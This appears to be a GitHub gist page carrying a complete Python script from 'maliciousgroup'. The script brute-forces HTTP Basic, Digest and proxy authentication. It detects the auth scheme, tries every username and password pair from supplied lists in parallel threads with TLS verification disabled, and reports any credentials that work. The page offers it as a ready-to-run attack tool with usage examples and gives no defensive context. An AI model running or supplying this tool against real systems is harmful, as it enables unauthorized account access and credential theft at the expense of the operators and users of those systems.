-
-
Save maliciousgroup/a48afd18cfe591abdbf2421c14f27658 to your computer and use it in GitHub Desktop.
Malicious Group HTTP Bruteforce Tool
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import itertools | |
import asyncio | |
import requests | |
# noinspection PyUnresolvedReferences | |
from requests.packages.urllib3.util.retry import Retry | |
from requests.auth import HTTPBasicAuth, HTTPDigestAuth, HTTPProxyAuth | |
from requests_toolbelt.auth.http_proxy_digest import HTTPProxyDigestAuth | |
from requests.adapters import HTTPAdapter | |
from concurrent.futures import ThreadPoolExecutor | |
from pathlib import Path | |
# noinspection PyUnresolvedReferences | |
requests.packages.urllib3.disable_warnings() | |
class HTTPAuthBreaker: | |
def __init__(self, url: str, user_list: str, pass_list: str, workers: str): | |
self.url = url | |
self.user_list = self.__return_list(user_list) | |
self.pass_list = self.__return_list(pass_list) | |
self.auth_type = self.__sanity_check(url) | |
self.workers = int(workers) | |
if not self.auth_type: | |
raise KeyboardInterrupt(f"URL {url} failed the sanity check. Are you sure its using HTTP Auth?") | |
@staticmethod | |
def __return_list(__item: str) -> list: | |
stub = [] | |
config = Path(__item) | |
if config.is_file(): | |
for x in open(__item): | |
stub.append(x.rstrip()) | |
else: | |
stub.append(str(__item).rstrip()) | |
return stub | |
@staticmethod | |
def __sanity_check(__url): | |
__auth = False | |
__codes = [401, 407] | |
with requests.get(__url) as req: | |
if req.status_code not in __codes: | |
return False | |
if req.status_code == 401 and 'www-authenticate' in req.headers.keys(): | |
if str(req.headers['www-authenticate']).lower().startswith("basic "): | |
print(f"[!] HTTP Security Authentication identified as HTTP Basic") | |
__auth = HTTPBasicAuth | |
elif str(req.headers['www-authenticate']).lower().startswith("digest "): | |
print(f"[!] HTTP Security Authentication identified as HTTP Digest") | |
__auth = HTTPDigestAuth | |
elif req.status_code == 407 and 'proxy-authenticate' in req.headers.keys(): | |
if str(req.headers['proxy-authenticate']).lower().startswith("basic "): | |
print(f"[!] HTTP Security Authentication identified as Proxy Basic") | |
__auth = HTTPProxyAuth | |
elif str(req.headers['proxy-authenticate']).lower().startswith("digest "): | |
print(f"[!] HTTP Security Authentication identified as Proxy Digest") | |
__auth = HTTPProxyDigestAuth | |
return __auth if __auth else False | |
def __auth_check(self, session: requests.Session, auth: tuple): | |
with session.get(self.url, auth=self.auth_type(auth[0], auth[1]), verify=False) as res: | |
if res.status_code == 200: | |
print(f"\n[!] --> Credentials Found! [{auth[0]} {auth[1]}]\n") | |
async def main(self): | |
credentials = [] | |
for u, p in itertools.product(self.user_list, self.pass_list): | |
credentials.append((u, p)) | |
if len(credentials) < self.workers: | |
self.workers = len(credentials) | |
with ThreadPoolExecutor(max_workers=int(self.workers)) as executor: | |
with requests.Session() as session: | |
retry = Retry(connect=3, backoff_factor=0.1) | |
adapter = HTTPAdapter(max_retries=retry) | |
session.mount('http://', adapter=adapter) | |
session.mount('https://', adapter=adapter) | |
__loop = asyncio.get_event_loop() | |
tasks = [ | |
__loop.run_in_executor( | |
executor, | |
self.__auth_check, | |
*(session, auth)) | |
for auth in credentials | |
] | |
for _ in await asyncio.gather(*tasks): | |
pass | |
def usage(): | |
u = f""" | |
USAGE: | |
{argv[0]} -h "http://127.0.0.1" -u "admin" -p /tmp/passwords.txt | |
{argv[0]} -h "http://127.0.0.1" -u /tmp/users.txt -p /tmp/passwords.txt | |
{argv[0]} -h "http://127.0.0.1" -u /tmp/users.txt -p /tmp/passwords.txt -w 20 | |
OPTIONS: | |
'-h', '--host' - Set the URL target with Basic Auth login form. | |
'-u', '--users' - Set the username or path to file containing users. | |
'-p', '--passwords' - Set the password or path to file containing passwords. | |
'-w', '--workers' - Set the number of workers to run during attempts. | |
""" | |
print(u) | |
if __name__ == "__main__": | |
import argparse | |
from sys import argv | |
parser = argparse.ArgumentParser(add_help=False, usage=usage) | |
parser.add_argument('-h', '--host', action='store', dest='host', default='') | |
parser.add_argument('-u', '--users', action='store', dest='users', default='') | |
parser.add_argument('-p', '--passwords', action='store', dest='passwords', default='') | |
parser.add_argument('-w', '--workers', action='store', dest='workers', default='1') | |
arg = None | |
try: | |
arg = parser.parse_args() | |
except TypeError: | |
usage() | |
exit("Invalid options provided. Exiting.") | |
if not arg.host or not arg.users or not arg.passwords: | |
usage() | |
exit("Required options not provided. Exiting.") | |
loop = asyncio.get_event_loop() | |
try: | |
print(f"\n[+] Starting brute-force process...") | |
print(f"[+] Target: {arg.host}") | |
print(f"[+] Workers: {arg.workers}") | |
obj = HTTPAuthBreaker(arg.host, arg.users, arg.passwords, arg.workers) | |
future = asyncio.ensure_future(obj.main()) | |
loop.run_until_complete(future) | |
except KeyboardInterrupt as exc: | |
print(f"[x] Error: {exc}\n") | |
finally: | |
loop.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment